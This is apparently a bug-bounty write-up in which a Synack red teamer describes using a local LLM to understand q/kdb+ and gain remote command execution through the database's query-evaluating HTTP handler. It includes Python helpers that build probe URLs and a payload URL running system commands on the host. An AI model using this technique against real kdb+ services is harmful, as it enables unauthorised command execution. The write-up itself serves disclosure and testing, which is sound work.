Synack Red Team member Nicolas Krassas used a local large language model (LLM) to decipher—and exploit—an unfamiliar database and programming language. Here, he recounts how he gained a big hacking advantage from an AI boost.
Introduction
During an assessment, I identified a critical vulnerability in a service exposed on port 7000 of an internal system. The endpoint was running q/kdb+, a high-performance time-series database and programming language widely used in financial services and data analytics. What I saw initially was something like the following screenshot. The service had been running in the environment for several years, but at first glance it didn't look exploitable.

For example, I could add two numbers:
Not very exciting at that point. But based on the headers, it was not a technology I had seen before. Still, the service had been there for about three to four years without any vulnerability submissions against it.
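kdb+ ships with a built-in HTTP handler that, in its default configuration, evaluates the URL's query string as a q expression and returns the result, which is what makes "adding two numbers" through a browser possible. As a minimal sketch (the host `env:7000` is taken from the article; the helper name is my own), the probe URL can be built like this:

```python
from urllib.parse import quote

def kdb_query_url(expr: str, base: str = "http://env:7000") -> str:
    """Build a URL asking kdb+'s default HTTP handler to evaluate a q expression.

    The expression is percent-encoded so characters like '+' survive the trip.
    """
    return f"{base}/?{quote(expr, safe='')}"

# A GET to this URL would return 4 if the server evaluates the query string.
print(kdb_query_url("2+2"))  # http://env:7000/?2%2B2
```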
Discovery and Initial Observations
Initial reconnaissance of the system at http://env:7000/ returned minimalistic HTML pages with legacy structures such as <frameset> and stylized <pre> outputs. Responses to unusual paths like ‘/?/’ and ‘/??/’ returned reflective tokens (e.g., ‘::’, ‘?/’), suggesting that the server was directly parsing and reflecting portions of the request path.
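A quick way to spot this behavior during recon is to request a handful of odd paths and check whether the response echoes q-style tokens back. The heuristic and the probe loop below are a sketch of that idea, not the exact tooling used in the assessment; the marker strings come from the responses described above.

```python
def looks_like_reflection(body: str) -> bool:
    """Heuristic: does the response echo q-style tokens such as '::' or '?/'?"""
    markers = ("::", "?/")
    return any(m in body for m in markers)

# Hypothetical probe loop (env:7000 is the host from the assessment;
# running this requires network access to the target):
# import urllib.request
# for path in ("/?/", "/??/"):
#     with urllib.request.urlopen(f"http://env:7000{path}") as resp:
#         print(path, looks_like_reflection(resp.read().decode()))
```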
LLM to the rescue
With no clue what I was dealing with, it was time for some extra support. Local LLM to the rescue!


So… what is q/kdb+, according to our LLM?
q/kdb+ is a column-oriented database and programming language created by Kx Systems, popular in financial institutions for its ability to handle massive volumes of time-series data. The ‘q’ language is tightly integrated with the kdb+ database, providing expressive querying, data analysis and scripting capabilities.
RCE via q's system command



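In q, the `system` keyword hands its string argument to the operating system shell. Combined with an HTTP handler that evaluates query strings, that turns remote expression evaluation into remote command execution. A hedged sketch of how such a payload URL could be constructed (the host and the `whoami` command are illustrative, not the actual payload from the assessment):

```python
from urllib.parse import quote

def rce_url(cmd: str, base: str = "http://env:7000") -> str:
    """Build a URL whose query string is the q expression: system "<cmd>".

    If the server evaluates it, the OS command runs and its output
    is returned in the HTTP response.
    """
    q_expr = f'system "{cmd}"'
    return f"{base}/?{quote(q_expr, safe='')}"

print(rce_url("whoami"))  # http://env:7000/?system%20%22whoami%22
```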
Security Impact
As this vulnerability represented a serious security risk, I submitted the RCE case to Synack, where it was rated CVSS 10.0.
Conclusions / Takeaways
The service had been present in the environment for an extended period, but testing was restricted to specific, limited time windows. This made it challenging to determine which technologies were in use and to identify less obvious cases. Leveraging a local LLM provided a significant advantage: even with only the initial responses from the service, the LLM offered valuable guidance on where to focus the investigation and which indicators to pursue.